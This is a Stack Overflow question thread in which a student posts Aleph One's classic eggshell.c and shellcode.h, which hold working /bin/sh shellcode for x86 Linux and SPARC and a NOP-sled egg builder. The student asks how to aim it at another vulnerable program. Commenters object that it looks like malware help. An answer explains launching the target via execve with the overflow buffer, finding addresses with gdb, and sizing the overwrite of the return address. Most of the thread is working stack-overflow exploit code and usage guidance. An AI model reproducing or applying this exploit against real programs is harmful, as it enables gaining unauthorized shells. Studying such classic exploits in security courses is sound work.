-3

I got this code of aleph one:

shellcode.h

#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE    1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE    4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
  "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE        4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
  "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#endif

eggshell.c

/*
 * eggshell v1.0
 *
 * Aleph One / aleph1@underground.org
 */
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

void usage(void);

void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a':
        align = atoi(optarg);
        break;
      case 'b':
        bsize = atoi(optarg);
        break;
      case 'e':
        eggsize = atoi(optarg);
        break;
      case 'o':
        offset = atoi(optarg);
        break;
      case '?':
        usage();
        exit(0);
    }

  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger the the egg.\n");
    exit(0);
  }

  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
    bsize, eggsize, align);
  printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);

  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  bof[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

void usage(void) {
  (void)fprintf(stderr,
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
}

I'm trying to use this exploit on another vulnerable program and I understood that I need to activate the other vulnerable program through the aleph one program. could somebody please tell me how to do that?

fuz
  • 88,405
  • 25
  • 200
  • 352
Elad Doocker
  • 197
  • 11
  • 1
    Please don't ask about help with malware development here as a refusal, and down/close vote, often offends. – Martin James Dec 09 '15 at 10:00
  • @MartinJames, there are so many questions about malware last time. Any ideas why? – kelin Dec 09 '15 at 10:21
  • why wont ask?? im doing this for research not for anything that will cause damage to someone...the valunarble program is a program from my studies... – Elad Doocker Dec 09 '15 at 10:45
  • There are, but please understand that it's not a personal issue:) Whenever I see 'buffer overflow', 'exploit', 'vulnerability' etc. I just auto down and close vote. If it has a whiff of malware, I always respond in that manner. ' im doing this for research' - I'm sure you understand that malware developers lie. I'm not saying that you are, but you may be. – Martin James Dec 09 '15 at 10:55
  • All those "shell code" exploits only work on specific environments and with specific compilers. – Jabberwocky Dec 09 '15 at 11:06
  • well if i will put here the valunarble program i want to use it on it will help?? – Elad Doocker Dec 09 '15 at 11:55

1 Answers1

1

Question is not about malware development, it is content of security class at many universities !

The target program must accept input if you want to run this buffer overflow on it. You start target program with execve system call which's arguments are location of program and arguments array.

You get address with get_sp() from shellcode.h, you get shellcode from shellcode.h and you fill your buffer (which will overflow) inside eggshell.c. Then you start target program with execve() giving buffer as argument and overflow will occur, which will open you shell.

Sample exploit example can be found here and its target is here. It does not use get_sp, addresses are harcoded there.

Update: links are broken. You can find similar repositories on google with search keyword "sploit1.c target1.c site:github.com"

Jemshit
  • 9,501
  • 5
  • 69
  • 106
  • thank you for your help!!! can you please tell me if there is any way to find the buffer address without using gdb?? because the program i need to buffer overflow wasent compiled with gdb flag... – Elad Doocker Dec 10 '15 at 16:03
  • i have got it with gdb, i dont know other ways – Jemshit Dec 10 '15 at 16:05
  • ok thanks and another question...do you know what is the use of align as a parameter for aleph one eggshell.c code?? – Elad Doocker Dec 12 '15 at 01:08
  • İ think it just fills egg with nop[], from starting from end of nop[] to beginning or vice versa. That nop[] with size 4 is for sparc system, not for linux. On linux NOP instruction =x90 – Jemshit Dec 12 '15 at 09:24
  • yea i know but his function get the align as one of the parameters but how can i know how much NOPs i need?? – Elad Doocker Dec 12 '15 at 10:00
  • You dont need to, it fills egg with NOP until shellcode fits at the end. Check outer for loop there. NOP is just skipping instruction which does not do anything. So when EİP points to any address which NOP is located, it skips to next adress until it finds executable instruction which is shellcode in this case. İ am not sure how many bytes you should overwrite in sparc, in linux x86 if you have 200 size buffer, you just need 208 byte buffer to overflow it. 4 byte for sfp and 4 byte for return address. Filling first bytes of buffer with NOP and last bytes until index 200 with shellcode – Jemshit Dec 12 '15 at 10:06